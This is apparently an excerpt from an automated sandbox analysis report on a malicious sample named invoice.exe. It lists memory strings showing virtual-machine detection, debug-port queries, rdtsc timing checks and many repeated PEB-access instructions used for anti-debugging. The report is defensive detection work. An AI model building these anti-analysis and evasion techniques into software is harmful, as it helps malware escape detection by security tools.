          Source: explorer.exe, 00000004.00000000.675249381.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.675249381.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000002.932678004.0000000004791000.00000004.00000001.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
          Source: explorer.exe, 00000004.00000000.679085865.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.675249381.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\invoice.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00409A80 rdtsc 1_2_00409A80
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_0040ACC0 LdrLoadDll,1_2_0040ACC0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0031EBDE EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0031EBDE
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0031EBDE EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0031EBDE
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_003311EC mov eax, dword ptr fs:[00000030h]0_2_003311EC
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00331229 mov eax, dword ptr fs:[00000030h]0_2_00331229
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0033128C mov eax, dword ptr fs:[00000030h]0_2_0033128C
          Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_003306F8 mov eax, dword ptr fs:[00000030h]0_2_003306F8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED58EC mov eax, dword ptr fs:[00000030h]1_2_00ED58EC
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED40E1 mov eax, dword ptr fs:[00000030h]1_2_00ED40E1
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED40E1 mov eax, dword ptr fs:[00000030h]1_2_00ED40E1
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED40E1 mov eax, dword ptr fs:[00000030h]1_2_00ED40E1
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F6B8D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F6B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00F6B8D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F6B8D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F6B8D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F6B8D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F6B8D0 mov eax, dword ptr fs:[00000030h]1_2_00F6B8D0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0F0BF mov ecx, dword ptr fs:[00000030h]1_2_00F0F0BF
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0F0BF mov eax, dword ptr fs:[00000030h]1_2_00F0F0BF
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0F0BF mov eax, dword ptr fs:[00000030h]1_2_00F0F0BF
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F020A0 mov eax, dword ptr fs:[00000030h]1_2_00F020A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F020A0 mov eax, dword ptr fs:[00000030h]1_2_00F020A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F020A0 mov eax, dword ptr fs:[00000030h]1_2_00F020A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F020A0 mov eax, dword ptr fs:[00000030h]1_2_00F020A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F020A0 mov eax, dword ptr fs:[00000030h]1_2_00F020A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F020A0 mov eax, dword ptr fs:[00000030h]1_2_00F020A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F190AF mov eax, dword ptr fs:[00000030h]1_2_00F190AF
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED9080 mov eax, dword ptr fs:[00000030h]1_2_00ED9080
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F53884 mov eax, dword ptr fs:[00000030h]1_2_00F53884
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F53884 mov eax, dword ptr fs:[00000030h]1_2_00F53884
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F92073 mov eax, dword ptr fs:[00000030h]1_2_00F92073
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA1074 mov eax, dword ptr fs:[00000030h]1_2_00FA1074
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF0050 mov eax, dword ptr fs:[00000030h]1_2_00EF0050
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF0050 mov eax, dword ptr fs:[00000030h]1_2_00EF0050
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EEB02A mov eax, dword ptr fs:[00000030h]1_2_00EEB02A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EEB02A mov eax, dword ptr fs:[00000030h]1_2_00EEB02A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EEB02A mov eax, dword ptr fs:[00000030h]1_2_00EEB02A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EEB02A mov eax, dword ptr fs:[00000030h]1_2_00EEB02A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0002D mov eax, dword ptr fs:[00000030h]1_2_00F0002D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0002D mov eax, dword ptr fs:[00000030h]1_2_00F0002D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0002D mov eax, dword ptr fs:[00000030h]1_2_00F0002D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0002D mov eax, dword ptr fs:[00000030h]1_2_00F0002D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0002D mov eax, dword ptr fs:[00000030h]1_2_00F0002D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F57016 mov eax, dword ptr fs:[00000030h]1_2_00F57016
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F57016 mov eax, dword ptr fs:[00000030h]1_2_00F57016
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F57016 mov eax, dword ptr fs:[00000030h]1_2_00F57016
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA4015 mov eax, dword ptr fs:[00000030h]1_2_00FA4015
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA4015 mov eax, dword ptr fs:[00000030h]1_2_00FA4015
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDB1E1 mov eax, dword ptr fs:[00000030h]1_2_00EDB1E1
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDB1E1 mov eax, dword ptr fs:[00000030h]1_2_00EDB1E1
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDB1E1 mov eax, dword ptr fs:[00000030h]1_2_00EDB1E1
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F641E8 mov eax, dword ptr fs:[00000030h]1_2_00F641E8
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F551BE mov eax, dword ptr fs:[00000030h]1_2_00F551BE
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F551BE mov eax, dword ptr fs:[00000030h]1_2_00F551BE
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F551BE mov eax, dword ptr fs:[00000030h]1_2_00F551BE
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F551BE mov eax, dword ptr fs:[00000030h]1_2_00F551BE
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F061A0 mov eax, dword ptr fs:[00000030h]1_2_00F061A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F061A0 mov eax, dword ptr fs:[00000030h]1_2_00F061A0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F569A6 mov eax, dword ptr fs:[00000030h]1_2_00F569A6
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F949A4 mov eax, dword ptr fs:[00000030h]1_2_00F949A4
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F949A4 mov eax, dword ptr fs:[00000030h]1_2_00F949A4
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F949A4 mov eax, dword ptr fs:[00000030h]1_2_00F949A4
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F949A4 mov eax, dword ptr fs:[00000030h]1_2_00F949A4
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F02990 mov eax, dword ptr fs:[00000030h]1_2_00F02990
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFC182 mov eax, dword ptr fs:[00000030h]1_2_00EFC182
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0A185 mov eax, dword ptr fs:[00000030h]1_2_00F0A185
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDC962 mov eax, dword ptr fs:[00000030h]1_2_00EDC962
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDB171 mov eax, dword ptr fs:[00000030h]1_2_00EDB171
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDB171 mov eax, dword ptr fs:[00000030h]1_2_00EDB171
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFB944 mov eax, dword ptr fs:[00000030h]1_2_00EFB944
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFB944 mov eax, dword ptr fs:[00000030h]1_2_00EFB944
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0513A mov eax, dword ptr fs:[00000030h]1_2_00F0513A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0513A mov eax, dword ptr fs:[00000030h]1_2_00F0513A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF4120 mov eax, dword ptr fs:[00000030h]1_2_00EF4120
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF4120 mov eax, dword ptr fs:[00000030h]1_2_00EF4120
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF4120 mov eax, dword ptr fs:[00000030h]1_2_00EF4120
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF4120 mov eax, dword ptr fs:[00000030h]1_2_00EF4120
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF4120 mov ecx, dword ptr fs:[00000030h]1_2_00EF4120
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED9100 mov eax, dword ptr fs:[00000030h]1_2_00ED9100
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED9100 mov eax, dword ptr fs:[00000030h]1_2_00ED9100
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED9100 mov eax, dword ptr fs:[00000030h]1_2_00ED9100
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F02AE4 mov eax, dword ptr fs:[00000030h]1_2_00F02AE4
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F02ACB mov eax, dword ptr fs:[00000030h]1_2_00F02ACB
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0FAB0 mov eax, dword ptr fs:[00000030h]1_2_00F0FAB0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED52A5 mov eax, dword ptr fs:[00000030h]1_2_00ED52A5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED52A5 mov eax, dword ptr fs:[00000030h]1_2_00ED52A5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED52A5 mov eax, dword ptr fs:[00000030h]1_2_00ED52A5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED52A5 mov eax, dword ptr fs:[00000030h]1_2_00ED52A5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED52A5 mov eax, dword ptr fs:[00000030h]1_2_00ED52A5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EEAAB0 mov eax, dword ptr fs:[00000030h]1_2_00EEAAB0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EEAAB0 mov eax, dword ptr fs:[00000030h]1_2_00EEAAB0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0D294 mov eax, dword ptr fs:[00000030h]1_2_00F0D294
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0D294 mov eax, dword ptr fs:[00000030h]1_2_00F0D294
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F1927A mov eax, dword ptr fs:[00000030h]1_2_00F1927A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F8B260 mov eax, dword ptr fs:[00000030h]1_2_00F8B260
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F8B260 mov eax, dword ptr fs:[00000030h]1_2_00F8B260
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA8A62 mov eax, dword ptr fs:[00000030h]1_2_00FA8A62
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F64257 mov eax, dword ptr fs:[00000030h]1_2_00F64257
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9EA55 mov eax, dword ptr fs:[00000030h]1_2_00F9EA55
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED9240 mov eax, dword ptr fs:[00000030h]1_2_00ED9240
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED9240 mov eax, dword ptr fs:[00000030h]1_2_00ED9240
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED9240 mov eax, dword ptr fs:[00000030h]1_2_00ED9240
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED9240 mov eax, dword ptr fs:[00000030h]1_2_00ED9240
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F14A2C mov eax, dword ptr fs:[00000030h]1_2_00F14A2C
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F14A2C mov eax, dword ptr fs:[00000030h]1_2_00F14A2C
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE8A0A mov eax, dword ptr fs:[00000030h]1_2_00EE8A0A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9AA16 mov eax, dword ptr fs:[00000030h]1_2_00F9AA16
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9AA16 mov eax, dword ptr fs:[00000030h]1_2_00F9AA16
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF3A1C mov eax, dword ptr fs:[00000030h]1_2_00EF3A1C
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDAA16 mov eax, dword ptr fs:[00000030h]1_2_00EDAA16
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDAA16 mov eax, dword ptr fs:[00000030h]1_2_00EDAA16
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED5210 mov eax, dword ptr fs:[00000030h]1_2_00ED5210
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED5210 mov ecx, dword ptr fs:[00000030h]1_2_00ED5210
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED5210 mov eax, dword ptr fs:[00000030h]1_2_00ED5210
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED5210 mov eax, dword ptr fs:[00000030h]1_2_00ED5210
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFDBE9 mov eax, dword ptr fs:[00000030h]1_2_00EFDBE9
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F003E2 mov eax, dword ptr fs:[00000030h]1_2_00F003E2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F003E2 mov eax, dword ptr fs:[00000030h]1_2_00F003E2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F003E2 mov eax, dword ptr fs:[00000030h]1_2_00F003E2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F003E2 mov eax, dword ptr fs:[00000030h]1_2_00F003E2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F003E2 mov eax, dword ptr fs:[00000030h]1_2_00F003E2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F003E2 mov eax, dword ptr fs:[00000030h]1_2_00F003E2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F553CA mov eax, dword ptr fs:[00000030h]1_2_00F553CA
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F553CA mov eax, dword ptr fs:[00000030h]1_2_00F553CA
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F04BAD mov eax, dword ptr fs:[00000030h]1_2_00F04BAD
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F04BAD mov eax, dword ptr fs:[00000030h]1_2_00F04BAD
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F04BAD mov eax, dword ptr fs:[00000030h]1_2_00F04BAD
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA5BA5 mov eax, dword ptr fs:[00000030h]1_2_00FA5BA5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0B390 mov eax, dword ptr fs:[00000030h]1_2_00F0B390
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE1B8F mov eax, dword ptr fs:[00000030h]1_2_00EE1B8F
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE1B8F mov eax, dword ptr fs:[00000030h]1_2_00EE1B8F
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F02397 mov eax, dword ptr fs:[00000030h]1_2_00F02397
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9138A mov eax, dword ptr fs:[00000030h]1_2_00F9138A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F8D380 mov ecx, dword ptr fs:[00000030h]1_2_00F8D380
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F03B7A mov eax, dword ptr fs:[00000030h]1_2_00F03B7A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F03B7A mov eax, dword ptr fs:[00000030h]1_2_00F03B7A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDDB60 mov ecx, dword ptr fs:[00000030h]1_2_00EDDB60
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA8B58 mov eax, dword ptr fs:[00000030h]1_2_00FA8B58
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDDB40 mov eax, dword ptr fs:[00000030h]1_2_00EDDB40
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDF358 mov eax, dword ptr fs:[00000030h]1_2_00EDF358
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9131B mov eax, dword ptr fs:[00000030h]1_2_00F9131B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F914FB mov eax, dword ptr fs:[00000030h]1_2_00F914FB
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56CF0 mov eax, dword ptr fs:[00000030h]1_2_00F56CF0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56CF0 mov eax, dword ptr fs:[00000030h]1_2_00F56CF0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56CF0 mov eax, dword ptr fs:[00000030h]1_2_00F56CF0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA8CD6 mov eax, dword ptr fs:[00000030h]1_2_00FA8CD6
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE849B mov eax, dword ptr fs:[00000030h]1_2_00EE849B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF746D mov eax, dword ptr fs:[00000030h]1_2_00EF746D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F6C450 mov eax, dword ptr fs:[00000030h]1_2_00F6C450
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F6C450 mov eax, dword ptr fs:[00000030h]1_2_00F6C450
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0A44B mov eax, dword ptr fs:[00000030h]1_2_00F0A44B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0BC2C mov eax, dword ptr fs:[00000030h]1_2_00F0BC2C
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA740D mov eax, dword ptr fs:[00000030h]1_2_00FA740D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA740D mov eax, dword ptr fs:[00000030h]1_2_00FA740D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA740D mov eax, dword ptr fs:[00000030h]1_2_00FA740D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91C06 mov eax, dword ptr fs:[00000030h]1_2_00F91C06
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56C0A mov eax, dword ptr fs:[00000030h]1_2_00F56C0A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56C0A mov eax, dword ptr fs:[00000030h]1_2_00F56C0A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56C0A mov eax, dword ptr fs:[00000030h]1_2_00F56C0A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56C0A mov eax, dword ptr fs:[00000030h]1_2_00F56C0A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F88DF1 mov eax, dword ptr fs:[00000030h]1_2_00F88DF1
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EED5E0 mov eax, dword ptr fs:[00000030h]1_2_00EED5E0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EED5E0 mov eax, dword ptr fs:[00000030h]1_2_00EED5E0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00F9FDE2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00F9FDE2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00F9FDE2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00F9FDE2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56DC9 mov eax, dword ptr fs:[00000030h]1_2_00F56DC9
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56DC9 mov eax, dword ptr fs:[00000030h]1_2_00F56DC9
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56DC9 mov eax, dword ptr fs:[00000030h]1_2_00F56DC9
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56DC9 mov ecx, dword ptr fs:[00000030h]1_2_00F56DC9
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56DC9 mov eax, dword ptr fs:[00000030h]1_2_00F56DC9
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F56DC9 mov eax, dword ptr fs:[00000030h]1_2_00F56DC9
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F01DB5 mov eax, dword ptr fs:[00000030h]1_2_00F01DB5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F01DB5 mov eax, dword ptr fs:[00000030h]1_2_00F01DB5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F01DB5 mov eax, dword ptr fs:[00000030h]1_2_00F01DB5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F035A1 mov eax, dword ptr fs:[00000030h]1_2_00F035A1
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA05AC mov eax, dword ptr fs:[00000030h]1_2_00FA05AC
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA05AC mov eax, dword ptr fs:[00000030h]1_2_00FA05AC
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED2D8A mov eax, dword ptr fs:[00000030h]1_2_00ED2D8A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED2D8A mov eax, dword ptr fs:[00000030h]1_2_00ED2D8A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED2D8A mov eax, dword ptr fs:[00000030h]1_2_00ED2D8A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED2D8A mov eax, dword ptr fs:[00000030h]1_2_00ED2D8A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00ED2D8A mov eax, dword ptr fs:[00000030h]1_2_00ED2D8A
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0FD9B mov eax, dword ptr fs:[00000030h]1_2_00F0FD9B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0FD9B mov eax, dword ptr fs:[00000030h]1_2_00F0FD9B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F02581 mov eax, dword ptr fs:[00000030h]1_2_00F02581
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F02581 mov eax, dword ptr fs:[00000030h]1_2_00F02581
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F02581 mov eax, dword ptr fs:[00000030h]1_2_00F02581
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F02581 mov eax, dword ptr fs:[00000030h]1_2_00F02581
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFC577 mov eax, dword ptr fs:[00000030h]1_2_00EFC577
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFC577 mov eax, dword ptr fs:[00000030h]1_2_00EFC577
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F13D43 mov eax, dword ptr fs:[00000030h]1_2_00F13D43
